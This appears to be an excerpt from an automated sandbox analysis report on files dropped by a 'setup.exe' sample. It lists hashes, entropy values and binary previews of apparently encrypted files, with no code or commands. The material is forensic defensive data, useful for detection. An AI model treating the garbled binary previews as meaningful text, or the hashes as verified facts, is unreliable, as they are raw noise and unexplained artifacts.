              Preview:<?xml<d.k;.^..&...m......a.1>.+..]#...D&...I....>=L.(..2m..T4..~.0$.(.#....^.....>;...4p.p.-..+...W...#.....n.......|...;...s....Y53.p.q...{.t..A..../.W /.9.{.Pc._. ...7.p.. d.......^.....i~.......q.....lEM.=..'...{!H.<s.fU:..$O......o..qr..I..V..$AC..L.....n...C.Z...Xu./.bj...E.q..S.....C.z..)+....u.Bc6..0...[.d...%..c._:.<...7...[2.\.......ZP....K.1.|.a..gk$..<.....q.&.c.D,z..V,o[..7.9.k.W...w.j...'z..-.....+<...A..Mn(...oIO....'..?c..m..vU....Bo..Y.@..N....y.Q....S....*H.b..A.......o........).....$B........|j.3...p7.\.%..)...{.s.o.M...R.9.:J............0..0s...w.L.uP.J.c...G..8...Al..?g.[....i...x.S..J...Y].....r._.L....l..n....M....0....<sXx....;...J'x...V......M...z.&s....k.m.2f9....9^..Mx.......ddky.j3.&...:B.....;VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1205
              Entropy (8bit):7.823513062019128
              Encrypted:false
              SSDEEP:24:wDEzOk76+c6Kbk5wfZIurRVtk9x38Be/MYPg26wbD:wAh6l7CurRVgx3EeKqD
              MD5:3E37EB4A22AF16C4DBCD99C3D680A94C
              SHA1:5696392F3D9F7EFBF6AD9061D13AE83979FF31DD
              SHA-256:C51C3FCE41D5366FB7CF55A21CD1CB3B6E89C7439AC66877091C60223587A5B1
              SHA-512:C4D516121227F95218035FFB5FA28664DB23EE84D497977B34AEE9DB0F3E724B8FFAC8C553F27A867DB8DC268478BA77B769C7570DC996B83495418655A89606
              Malicious:false
              Preview:<?xml.R....._.G......y...!.^.M..Y.I...mN.^5.Qg...9..Vp.:..E_.......|.+A.#....&....`...bF+(..E<.W..5..A".....J.......b...y.93Ms.?..T...,UF.3...%.).9.....\D..Zs.i..b.....~.$y.IaR..0.@..O...C..(.....TLL...ic94{.6+.$A:...P.u..D.h{.E=.)M..Zt...^`S..+...._...Qe.DR.}8.......MA..V.Wh6.E....:.]o.Lo<.D.hR.vA~.|k..@C......*...%...{.A5..V....+3._...6.v.t..9..l....=jCIl.2..iM@.....M'.29.w..k~....S.p.h2E.t....^&M......Hf.!...-EE...w....6.G?K._%.............{Lo.y.f..:5Edv#~.:......S...g....!........V^..6.qF.n.....}..U.6.4.QY..D.8#.R.g.,...$m.e.|\Q.':C.%x.I.n.q...p....7r#....-.I.(.g...p5.....56A2.v..N......7kJ...l[..L.z..a`.G..Q...d.N.Fj..^j.5v.8-.pW....Y<.!.A...;M.=g.......a...o..x&..#.........W.AYc._\%...#"f.BB...uT@]d.Iig.......n..i..r.crW..?.:.4..6...pk.f-...hb.....0...\..?lz.^.&..B&.p.o.+.G[....5...\.....0.|.....({....F..M...c4.%.ap...O.M..>p.'..LnC._0.)..:....@....O....?K..........\..:z..<..J..Z....-&...7.i.lz..Q.T|ch.....;.[.b..F3......5i......l.......
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1004
              Entropy (8bit):7.775415895600916
              Encrypted:false
              SSDEEP:24:EmlJacO8iy1t2fNs4vP/1EWgn/gR/lN8JOdbD:zlBiyrwW40IR/PLD
              MD5:FCA26BB6B4B27B91C3C00EBA9D4B863A
              SHA1:C13E459EEB5397CC6CCF0FDF49C3F6D383605A57
              SHA-256:E3B5B129D838C4C2AC88E390ACB00775EB075CC7295875E5F6AE4DED75A69129
              SHA-512:8D957AB8C40803D2BB603BCBFE8937EFB4E845BD014517AB7BAAF17F1D6DB849F72FA3C64E6BD3140778B0398FE327ED94C215B89FBDD726DD8B73271E8F78C9
              Malicious:false
              Preview:<?xml.c....=8....;m.O6.k."7...D"7..)o....ib..7.h.....3...w...l6.M.(.}..)..m...g.........S..0Y?......tH.S.9.A..m......-./.Q...L..N..:Y..<ok..\....6v..v.C..njf......h+...^..Y.5...:.x^.......*...K.F.*)kgw.Mvi...g6.be..2....f.5.Y..B.w..*..o.LM....&.f7.@g...$R.e~b.....0?5.".X%\Jn...6Q...\.m..r&..H..}..[..X.../...N.[O...........F..g...%...S&1x...1...2l..U...D.T....G.,.,p.S........A.5....D....Rr.*I,..A..O-..;/<.#P.....).=x...r:R.0.....B...MoC,...(!.b.;P:.\u?BR&e..5.].....i.v...S..2^.p.{.._.+D<...R&.h..u....H\.,.3Q.....?.k>...H.....5........s~..t}N.Mj5m}...u.n......H..z.H).t......e.C.&..`..&.....C..@.XP..0#..Io.EZ0.N..rEQ......._ .8..72.{.5..i.z;l..r!:.m...uo..a....l.Q|.._...s.*....K..{J.*I.t..7.....`.-.a..tZ#.......`.....0....$.3-....H..4.1.j$.f.Hl$.u~./.J....?.KB6#.0.X.c....)9t.........FB.....\.*...~....Fj..OQ.%.j.4<q.$a.S[...U..U$t..(.$."....t.ri...y.E.._le.f.o.y9.#VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1697
              Entropy (8bit):7.85986944512299
              Encrypted:false
              SSDEEP:48:SnXtIOYr89LbmDWDf7Q1IFSqH/RgYMjy3D:S9IHybm6CIFSC5gTyz
              MD5:B37DF539F995FA3405472C43DCABFA1F
              SHA1:0BC0DDB348252B26102C56D4FBA3ACB75923D25C
              SHA-256:03C9A15A29D74FCA8861916254B840E02CF7D9960DC10882C751D82F8D318D55
              SHA-512:475A2CB44B42B77D1D84526D21BFE6AE27B54B8EC4A6A38B25E56B25D2EA01E20BFFD22828E96DF5089186F831480409672701BB616A7D60DF8007DDB5E32FDE
              Malicious:false
              Preview:<?xml..I.^.`....<. 0..0.......E..v..\.x...I.%..P..(y2$...Y^..w..B....5)..{.B...=.~.j....._1...Aq...&....kvX..,u..wD......s.8.........].e"......o..r..eA.?.d=...,o.........u_]Dl.xZ.D..Im.M.W...l{......9%..8Qo?..w,...)...w....i..C/.p.4b..5qm.....j}I..ks+TCB..C.Z..^.n.f...)...dV&....!...mj....~^..l..A..[..O.H..2I.Zh(.#..I.<.h...l.%...+._...&L...6c`...".U.:.e.r.....A.v.-...}#..R.0..JP.N.8...5y..o.4..+..}.Quo....nX."......XWm....[C.....2}.x....?.pa...85}...j..X.y...x..Oy..a.....W:...^......R2......H.n...v....F>sj.U..Q..i~...c.m$uQ..u......:..v.g...o.._.X.$*...u=R........(:7.Z.I&...n.U..p..6M..S;+N..^..d-...rd....Z.........!...yQ`...^=mZ...Q>.j ...o..;."H.)9...8.y...U[..L...L.$....~L5%L..$D.J..s..yei+.zYC..^4........l.*..e..E.o.u...Q2..g../$.V...c.N..<...?.xd.|....(..lB.jy.....l.F.D.AcV...T.`*P(-.;.\.<k._zG."L.gme.r...}.a.h._.:.....e.v..<.,^....S...n9.Qb..K.2..=..d..fM|.oR...........P0.|..Rtz.2i..<...qCfl.i.e..../..F...a...#..]E1.........
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1734
              Entropy (8bit):7.89216372272198
              Encrypted:false
              SSDEEP:48:ppr64ecNS4LiWHKvkiTZTXpjfvPzqj862Bv/D:zm4ecBBtiTZb1fHHTBD
              MD5:8D80B1DF5E9CC857774AB012F7687F70
              SHA1:272370A9220ED22E39B04CE250EFC2190BB4DAD2
              SHA-256:B708DE01977CC37975DF06A85E3EF4D9A4CE886991392DD4BCEA04716A2BA3A5
              SHA-512:CB5668593C27DB1FCAFCD0CAE7F635DAA271D898CB9E0A4EC02336B37ADB9C8D022B51DACC2A1483F43A2778275CF6CFF9161D6ADE5FF0C956DB78B61D4E1869
              Malicious:false
              Preview:<?xml....6..#..R.U...H.Q@...Im.&B.;r..D+j.M:.Y%.Y..cZ...h.a.}y.....$.bq.V...G...>......?1.`..F7_.`./Lr.....).....Z.......y.M....dk....F[j.V.........-.@..$..R.C..o..5.&I.'2z..S6.5!*.<:)...99........d.....0.:c....."H.?.....6.b.N...N...H...../y....;G.'.........BN.i.\x..K]n.w.......M.:..W..92.....<..o5Fwj.[P!+...gU%..rsh.....vyF...............'.}........ks....W.Jo..:.DL.r.U'....%f+.H3U$.'....T?..'f.{J>.L.z..g[P..=...h..s. ..c....y..mv...gB6..p...,sY.=M.0a.*Q+Y2(d|.:......s............x....+..<....Q...YU..i.fSfO3:.A..6.....`...z:...F.M.e....oT..q.B.@.T8KoO9..8N."...dG........?..T.b..!,qq...7..:.....U..o.....03..........>....}xDP..x.Lu.8........m.....~...`..m.}_=^"..P6...!0l..i.....:...+1..C{.E(.)v#...k\8..A......}..].`.]h.....w.j..yL..Zp.S...|6^.. ..kY.k....1....%F.R'Fnr.V......R..M..]L.g.P..h'..5....\.C......&.....;..'..T.....c...A..-Nzyy2..w...Eh.R..*.P.W..6..l(,9.@..m.^u..:.........`..D.o.........>u!]y.O.w..[\.f.."...9..8aYI.{B..5Ys......@.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):771
              Entropy (8bit):7.695597202976049
              Encrypted:false
              SSDEEP:12:Lz2ttUha1mMgBNAVHCoMJb8JPtClmDha1DLOvjDdywMIFrEg0xuvzbZw85sMR2cq:Xo1mHqAcJPtuLWxMIFrELxAzbZgbD
              MD5:64A7937E48612E3EBF4BDD51461E5CAE
              SHA1:3FAC25464A7224579DF94412650AF7E7CA155B34
              SHA-256:73A45AF2E7DD32B02D71E6F9F913365FEBC920AA78AF967208430B07F5C00A40
              SHA-512:B050B01C38B43F030F84553B020D5B939D09759D431EF50370CB523DBCF9E7C6FD6DBE5E145CEFB0D19627DC2AB7A7900A5953A2766BB2C019B42A888EE2CD6C
              Malicious:false
              Preview:<?xmlKX6.C;..4||.<..2...>.......J....u;...=r..F.y$..A...LSS..kJ.I.F..4m.....z..H<..G9..snR.,b..\YD,}$Mn..[.H...2....KA\!.Z..S.'|./YRL.....3P&#ZNM;..J.V.....)>.....1p....$!\.X.-..=.{...}Rmz...D.T...E.".*??.*..1......7}i.x.@..ME..).M..1.L....q...tLps.....%s.F.Rglf.@oc.>Z.`.M..x.W.1...L427..0.,....../..t.. r..Bn.d.~..'_Dy..k@.8.o....F.u.5."FN...UW..H3....U.../......\ .V.!|.T6n...*..U...M*.<., .........hq...Pl....w.+v...E....3.4..F.\.....!m#...Ho..[g._... ......x.N....r...L'.<...U.........>.-.jNn.w"...+..`..v..ra.~...S.....L..,\*d......+..b*8....-.................J".R.D.:.3.....#...L.fR.?1..x2.!..V*....H.........i.$L.p..M?............Ybf..b.}....NKV.\BVrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):774
              Entropy (8bit):7.7334055590721045
              Encrypted:false
              SSDEEP:12:Ozw4zCy7ghKAJW+uotUpLqcJneJ5ulQfV2SU46zaj3eFmA5XijCKDsMR2cii9a:Ow4eLo4FqecJW2+VU4aiuFmAUjCKIbD
              MD5:B1C6BC105930785CF6225BE95B41D8DC
              SHA1:BA6963BC2146EA9963311AED13A26BB6DC7AB442
              SHA-256:BA1D661707F851E91B06C6706EA257E655CF3AE8D6C2DAEB4F2FF53E3E422709
              SHA-512:FB4225CBF8BADA12C1A646C510C696A873AA105964A779D704BECA3476D245A657F48128453568907A8A2A8A96C4171CDF54AF88BB4A0CDDD774FACE79BD8B40
              Malicious:false
              Preview:<?xml....W.....|.,.%....7..e1.$.....m.........A....)ro>.......'y.e......,..I&C.h..A.?...f..7"....F.l..],|/.mi.....O......~.)...{.'..=Q..K....K......j..&x...\}...8*^...<..Gf..E/1.K6q...........d...k8<u...^."...G.{.=...H...Z....q......}6.....Z.gS.....1..6.S.!._7.8.~;..D...`..r..x.....e..:.Uu...I\.V..d>w^.C.9c,+b>.!..Z........7..D.'.`+8.(o.<.+......_..a..6....i..q...-.^#..D.H/..|.......A.fcM..#G.].6.a.ww^.p..a.*.....?.t...LI;..g.g...l...Q..T..m....%...........' .}.,,..S-.....Db.5...y}d.dc...zs....i.F....&1...I"\a5ky.....$..co. ..j.t..`...q.b.....I..._........]...,.S.I....j.K.m_}..@..F.m.u.%..\.mA...a..f.v._z......}?...OQr.t....i.J+.m'E..;c.....d.....0....VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1693
              Entropy (8bit):7.885749583797288
              Encrypted:false
              SSDEEP:24:BmqG/a3k0ZdrApBUqiDunZLwh1wb/gYa7czQuyj1rDHDDZ/0s74mPNbD:oqG/ErDv2Zc6/9zz721Lt/0sNFD
              MD5:A2473BE6AE01FF6A131CAA3DB3A42A3A
              SHA1:01A51ECDA033CA254B288F5A3BE530781E3F7751
              SHA-256:EFE9CD27403C342A9BAE08B9BF351B0B722DB99651D1712AE95F5F01B01E35EA
              SHA-512:5ACC22ADE5FD2D6EF13B03FAC9395636236DEE31D33D2403B2A56A046696D9DB17DA2D6218624AA46600F475E76C92DCD12502B5CFD29563087EEC67A5E12A5A
              Malicious:false
              Preview:<?xml.c.`.s./.....2,.zu...V.@.....C......K..U.P.K.IZ1a{..9....:...(..^c.{....1*....B....\ ..._./..[.5L.M>H.........u..S...S..b......k.....s..;k2b.(.....[...Z..'.o...^.n.....i.Z..;...[..{f,EH...5..[.Q...^.0.D..uO..eS2.....k...........%y........d..'...Z"...xt..l=.u. .'|.....X......m.YJU...S....\@e.......TeI.q.G.....|.Ax.?..\...F...,..]e8%~.n......6C.6.<..OS7...vT.Y..d.2~kd.6]..ZD..Po.z....Qa..4.!....7..f._.ced.y..r...`:.......0..(.....YmE7!.W..B9....#<.ye5c...XP.<.....ht........z%.?"u.KW.6..O...<..?.o..X......\...o/C.(a.V.1.!.*.4.%aa;.E..i..|.".B.G..5..X...Zp....D.....t...}A....+.8.1T..f.'.b.3..M8....r.....G$....wt<+O=...T>.V........W.=..G..H.Vk...%....|.3..M4&4.Siq1>....h2.../ ]Fy...}6....LHV..j..\I.,......i.a..k..Q....?.t.7.'....D{.R$..+....a.Fe.3C.T[.*..B...>O...7..M.._-k.....g}##<r.3...b9.H2..9R..*.Sl:.w.f...c.m..8*r.d.~...me.o.1{H}af.nH...u...........".I..9...E...L..V\.X.tq.Ah.K.vD...J.{5V[a.O...6..c..7.Y.........GA4..H......iN,
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1730
              Entropy (8bit):7.895496561657206
              Encrypted:false
              SSDEEP:24:IT4yzVIAEgGzkIPbe5p7OWh7BYsQqmYAJjhjAVFl953UCOPIITEkeCgQJTuj0t2o:ILVvuD6WnjOFl91elugTc02hGD
              MD5:392A2B5EE2C54FED1897E51F71D3EE71
              SHA1:DD92DF0D30C7AD6CEB0C1A2C1174B0A78F1B501A
              SHA-256:0A37D7B4628C992A75372DDE65989A124B294F4F0CC4B9F50005A57E0DCFCB78
              SHA-512:3B93CBB6579D6B94A5865B99F8F5BD1F603759C0C197F8E0C90C809CEE1E679213126A9E333CD5FB3FDE6600C0EC81E9E4C408E2380DC37CAE707F0908C7175A
              Malicious:false
              Preview:<?xml\m..h+..d......s..Y@O.E.OW..q.B...b.|._Vf..Su.f...R...U.c..}.n.A..............+.....p...%...-E...T.K#:..6.]n.S... .3.c^...2..,.NUg.U..L(Q.a8w.|o.|....e..-.... ?.5{.B.J..Rkn.JCk4..N...:...w-9..e....5.U.W.'.d..'...e.+....m:NS.....[.........L.5....>..~..-...Q.a.....i/......(....TQ..W..*..zgmD..9!.M\..C.2..}..O.....r...S.X3.5.Q...2....].fK.K......0B...f...)0....t..Z/.,.....e.B.o..b...X~.7V.6...v\....r.R....U..:.{....S.....$..a....+).>...... ...=..C.`..{....}XS..a..\%s.......RN.j"...}...0..ub...@....5..3.{...D.=."..y_7..Zb.g.p...(%.k.a...,z..!|..F$(>..../.....E..<.UG....<...M............N.\...."....Q.qY.....2...Q!\.p.^.L.vG.N.......,H...g.GV....He(l....{.....$..X. kp.V.F9WK.k..D.._../.....l3..8.-<`..[.(^.-n..-.....{.p.F..5.g.....TQ.<v.....W....m.}&.f._...h.....W6F}.Z.Tt.....5.F.;...5....Q.E..!9....dawOA7...E+%".. y...x........2....-..&._.D.8.}.....}..G..{...Dg.N...P..$........V.I.'^L...3.#.0.5B.....K./.m.W....D&..3_..,z$jdT..:...j..1 ..
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):753
              Entropy (8bit):7.679713868345099
              Encrypted:false
              SSDEEP:12:2+tsK6ApZW5FUaSyMreD/t8BT4/WZcqtEN10V1I7PAFxQCTJqSTXcT81CNGf7WsV:2M6Apkma5t4T4+ZciEnPzAFxNXcT81Cg
              MD5:2481D0DDC6178946C60A77B1B35F7128
              SHA1:80851A61094EE1E9323D9A8E838A8D38C03BCB98
              SHA-256:76C3AF47AA4A7978385013A47543548F4A73592AA69724C0CFCCF12BDB215B66
              SHA-512:DEE5173784D31D720C5640BE76C2E8A75F29E9229D1ED22FDAF8FA0C2880F64DE85FAD3A762D6E9454D31C5225019E7A466D91D95AA67A41D92FBD01D5E9B554
              Malicious:false
              Preview:<?xml.....}.e,...."\R.Cn.WH............._.8.>..:.I.I...~...Tl.KAg!......<...^Zbj..bqk.Fk.{Q.Kl..E>.:^)..Q...-..>...z2...~d..g....y.K./4.XV...sa.....K5..u.UZ.."]..e]2..F@.q....4O...wf.wt-9..D...-.k.w.u....cp.zS...L.U.ra..w-g<...-H."0.... g.`;.#. -R..[..94<o.....QHhXp..I........V..,...P.}1.....f.:@XLC........r..tP....H{..`*..F........]....l...z.$.....6...x.x..R}...e..D........`.d5z..{JO...X.d.......h..S..aU.f.y.W..LMG.U...Q...O.VC.LQtI.....]..].w..$..X.........-..*D,.PfL...t}...:.X....+K+...<..."......}.b#.W.4Z{h.v,...-G..fg..{of?.13.../}.'....]..P...P+y.!....7.=...4....{..o.Q..tI.h;..C'.{~:8R....2u[.....`;..P..)r.q.L.lL..eX|w......VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):773
              Entropy (8bit):7.7305938512510455
              Encrypted:false
              SSDEEP:24:UHl9ans0xC5m9QVeA8pCaChawHPfOSvk6HbD:UKnsrm9QLgCxtHP7v1D
              MD5:A22DDF58B6372D89F47CA527E65E4D8E
              SHA1:3F198DEBAF26C764D47356442A39B49D0A7BBF0B
              SHA-256:30467D2B99314CF7CD875476CE5679EC62D1D605C4546A8580BBBF44AA4DDCC5
              SHA-512:B9B3D95FBA068F47A2D3EC3B9FAC78F998B0C3A24AFB1D446ADAD8BA91C13FE77DAE8025815308029AC867C99AEA7CEFA65EAD28BA7EC1EAE29DB6559CF0EDE9
              Malicious:false
              Preview:<?xml......TpZ.U{s..Q W...J..Y.D...~.}.....d....&O7.gM>.9..b.v...20...C...;;.-.Zp`.s....y...H|WP..@.-.,.k..pQ....B.J4F......%F....[.'..)/+.._..Zr...:ER=.......J^...........ze`'.#:.(..[.........y:>...01..a*....y.....WK......3..O..^..t..FF.V.....GL;.n.i.{.v._...2...1...6....~..\..)I...T.c....;..>...B._..Q.......h.........I.!0cA....4E.F...........i.2.....~~r&...e.../....v....]..t7ie/....Dqj_........."....u..P6.}.-.....1uW(.......+...F...}...}{z.u.W3N.~.......K.8...t.5..W...%.vO....s..Zs..*.g>.@.h...I.z.....6.....N{...T..\.Q.......{.).m1......r.`..h3...|A.k.....Nn.G.K.mOq....;..1<oT.)..Z.X.....%..q.Q&g.....J@,&)...2..$.D.b..".4..ku7.2.#(...?..9^.VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1699
              Entropy (8bit):7.897511405352323
              Encrypted:false
              SSDEEP:24:UxjkU4y4+FU/GzKvkQAljsgzkcWTY0rb6nRdyj5IqDnAVZ8fwsI5G+dRp7mYeH5X:4kVy4n/GKsQAk50yeUY9Y+dR5HeH5D
              MD5:5BA43C625C87825E435139107466397A
              SHA1:DF056F31A43A35B550574D38EE9150FA1D0FF715
              SHA-256:FFD1271BBA385E0F865DDF26B6A9A4B0EE1ED0E722F433603A52864FDD7CB77C
              SHA-512:6E30D8A3D9506C5C81675A20F836253D3DEC53D125A2334899D26815256AB9D20B83446F84F5E342A26DCA9B5EE90B83D289C5841D7AADBD8AC74CD34F9E3980
              Malicious:false
              Preview:<?xml.z..\......;.2.b.P#.O...lC3.#+......q.c....&....<G.W.7f5(.......x.h.......P...2..$i....-..0..JK..s1h.z .<...2....Q..v..2&........eM..{T.........A.../..........M...T.......V7W..?...z..w[.s..m,w.....)R.A.X.j..d.-_!.......*..bh.."-..J..(0.<O%[2.........!....'..PZ............As.....0..5.H.o.}.........aF...2....Z...z)M...@.......1..6.....Z.^..... z../D4..!a.4$...y.wg.{.0Y..u..C?...4}.3.+#.v.s.1_....e..u&.....H.J...3.}VYF.@Q3.l..4)qvx.."....4n.'...X.l.....4..;........@..Fx..ao......~..C.......:.R.?...Wh9....'z#.4c......6}.zW{J.q........a.5ODU}.l#....-v...4....Q.9....Vlf..b..C..{..E7...B..l.=A-}..1..............].....M@.w.....P.....Z_....`....<.(I....@...<....I."(.4!.F.$.9G.rU.~.....{..7.k............^..BA...........<{.L.Km.Eb.[.......7.EE...N....Fn.Sp.1E.....{....#..u....,.W..w..Bj.Z%.x.-.Nj \...c..}...|U......ko.......I.....6...A`*>uS\...\....<....:....ixt....4o../.P;......JV..@......^.......K..y.L.LI.D...6...\q5.%....{pu.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1736
              Entropy (8bit):7.874969267597574
              Encrypted:false
              SSDEEP:48:vYo9nS+FsAohbezg9gGK8+6HCLJh1ht3LrPETWED:vYoOAUavGK2Ybht3PPq
              MD5:F7E96BC4D3D5738658A56FD8B29C5903
              SHA1:CBAA0DDD113A6B00E8FBB52BB8D1020FB84740C8
              SHA-256:C52E57571EF0DCFD78813499501EB258285FCD904F2E662452B0B124FB821035
              SHA-512:6FEC088AF6212DC522BD65B563300CE0563986AA6DCF2442F054D058162EBA818313B83E629D58C313B35D1AEF24C92C34ACAFEC44C792975018C56EF175D75D
              Malicious:false
              Preview:<?xml.Z.U/.....&Mb6...v..."_}....$...F....7(T...i..].x...g...F.h^...h1..[$Eg..N.....PMV........s...&%..R.l.EQ%M..p..(...I.#PE#.............].x.b..8.Dqk.b...86Y..G..Jk..6.....d=i2#.w.t.U.8.XgM.8o..%..`8o..XLv+......>.../F...s.{......y.!wc....nvm......lr(.8I2 ......9..@..y..IcZ.(..I...tJ...9..u.3O1.....@.,R...Yv...\.dy....w.c.`...`.h.>z.F.D...7.....ob0wA+"g ....+..l..Q`...6.6&.....!....bTE9NZku.aGi_).,..oK_.=..w./..s..[...%r.8.>z...1..?&.[...V.'Id.rg..+nb.B .].K.D.D.&.L..b..~....".5..%.*... ..j...a.Z.f.s.!(5...5....JE..6.gW..*d.).g....?..8..O.M.....7u..2Uz....H.$......f(hN.."..KQ.R..@....(...>..k.5..^aW?.......}....X.....[..`.'%kS......)....#.^q.....g....)..sie.5`..4Z.G{..8.^..]b@.6.._..?.k|$.[....a/d<.s.V..j....d..4..r..L...?.+.D.hwB.3iNJ...M.7.....T....&A.dw.MID..J.......yCh.C.........:\.....2...D.B.. 7Z...Wc.W.q.K......uGV.....D.B.rJT...-e..@..?>.,yC....g..j:[#..b..w..B......)....l.]..}>g..t..Z~.Z.(...*......[B.R.{....75Vp.qO].h...'{.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1689
              Entropy (8bit):7.880143363081103
              Encrypted:false
              SSDEEP:24:fl+XKFRItQ+TMEGbA/Jn8cgGMuxAaVFvOIiGj5VHjcXXo6Mdf0popvnRL8xTb7WX:YXKt+bGCneGZeaLO1YVKXtkl+4D
              MD5:A31CD77EC32FD0A216B3E66285F3F18B
              SHA1:CC9A8AD155374D0579FA903CEFB42A5582635983
              SHA-256:014AEADEFF8ADE692BB8817B28919DBF30F9DEC2731E57AB8DD95D15B03A567B
              SHA-512:1B62749A02B058798AEBE246072F399AEEC0440B6D6EAFDB94959DC621CD3C8887A96ECACFE74CA21EAC05FE5D4DC85B2F1ADD7D9C6BB5C92C4C00E337E61290
              Malicious:false
              Preview:<?xml.!..=WiE.s.hz...f..z#.qJ..w..e.".I.W..>R.G..(a..W.Y....}....Y".6.....&..L...e..D.g.W.P......%....m......A...R[%K.qT..t..P...:.......%...F..y.j.."s.rh.l3.E6........+....9.*..`.A.z...].A.p.v:..ny....I.56.g.,....U'..U.R.c..@._C..Z..-.a......5.3.P...'60.1.:qW..qj..[)?....."H.Z#.^.y.{z5..Biu......*j..............M1"........~i.8......O..=.S.H.....6.".'..M.yw.18.HW.{O.....P..l....".,M.e.l}..9...A.Y|G.Y..H....{.>.L..3.n.. ....N............X..|3`[./'._....2..]Pag.s.B'e.,#W.9F..X....k%..c.3.[Q>Yw...8.K.~s.......oHc..s......'N.....".......uE....f..._.[k...u..tC.c......U.B.j$-..F1.&{.)..........g2+H.V........h...*.jNG.......M..%+...E.....5.|Y.|......x...o.5......O.^..7\u......<.]..V?...'d....Sq.;..X.l..v-...|....vA.....*..-}-.... 3..^.....q.]1...fb.=.UWM..hTf2..sM....;..F..N.d?..L..j.....8.J...bS....KV.........7.V.R.....D..b".....|l.|$......u...\..X.z.2..Gh.{..M.k(....x....?h.s@..g.....3.S...}.9.O...{.nB?[.........8..HH$./.p.OW..@
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1726
              Entropy (8bit):7.883954341872996
              Encrypted:false
              SSDEEP:48:OU1Q2GC2VX1javSvLBoHVFpA/a9P8AKQG4a+D:d1Q2v2Vl+vbAe9AG
              MD5:3F6915FA54B808DFCA0EB6A7ADC828B5
              SHA1:09BF7D997868ABF86C35103AFB98F5D8A3A61A9B
              SHA-256:ADE165B2E0BB4379928316A03F05DF21BBA09C573A80306A2A5DA88D8D7F77B7
              SHA-512:C6AE0081196AECFD63FBB680675C03735A6CAFCD01492AD5CE1279BA75CE8840113B724AF21C08068152B0C0942FA26752AFF942809D61621227DE994CDDB173
              Malicious:false
              Preview:<?xmly..........!..;#\..s.:_...>b..h.....n\2.(yq.=.(..C...>.O..q...$..Nu-.....a.#....c..b...$.5..G.o#...F.....y.......x!.r.b..o^.....MW.}..rP.Fg.....z%H..(g[.VB..V.D..P.S...D1.......b...K...Z.....]i.s}....o.z...).W.}.l.>.O..v2.s.v..B...-...=B....F...2.$...$.&....t.\Y&.+...oX...h...O...GGd.n.~.0G%...p..:.~...|..x..U........5.c....>`.Nr......LT...Y.......}h.d..9.izp.Xez$;..;...^.B..D...0....F..VC.:.W.1...CK6...D@;.f..6..U...(.j!.%.`6.v.n!.v..X{..%.aY....%....4..o,...[<t.>...-..0QI..f.'...J.f.Vsu.M...?4.O.xp!Lh....:.qywaS...JY..\.....(.q..g.^.o6-x.W...^.....#_.C.x...........w......Wh?...3..h<.f...Y.,....C_.&dFF...&.:.......n.^[.....UXaS..R`.........9.E...jv..J.2..u?j....@.G,.2ej..oT..q:p...d..:N........Ys...T.1..z.pL..Vl.u.;S4C........ng.`..X.)....Rt..m=.Q ..A.9.1.{)..A.t\).\.-d.8.'.".X...~...?...+&#yWy{........o;9.........4..8~...S...i.^........B.......G.0q.t.T>.bX5#TK"=7.'.<..r....t.:..;+!.R....T.6.0.L....'..=.....J.gu3.....).`4r
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1701
              Entropy (8bit):7.890886121431589
              Encrypted:false
              SSDEEP:48:53on/58IUXA/6OryJtsInA4walUGzGjA3wwT7rmqsD:54nB8HXAzuDA4walUeSA3vXI
              MD5:C1F8D55852700FCED28B25D0E049D221
              SHA1:483C632BE610E1AA5501DE60D816476EBA85290D
              SHA-256:4A1EC2CD34C3C6CE37B030BBB15B168A066A580A1F331E3B2F88C6C7C35BDC53
              SHA-512:141F15B5D7D5007BFCA6146A00E30A492D177901BECB643D17F1EDF6E37F3A21B11340DFEAADA9B8C671B38989F40111227E0FFB462D3CF95753DB6D15A1966B
              Malicious:false
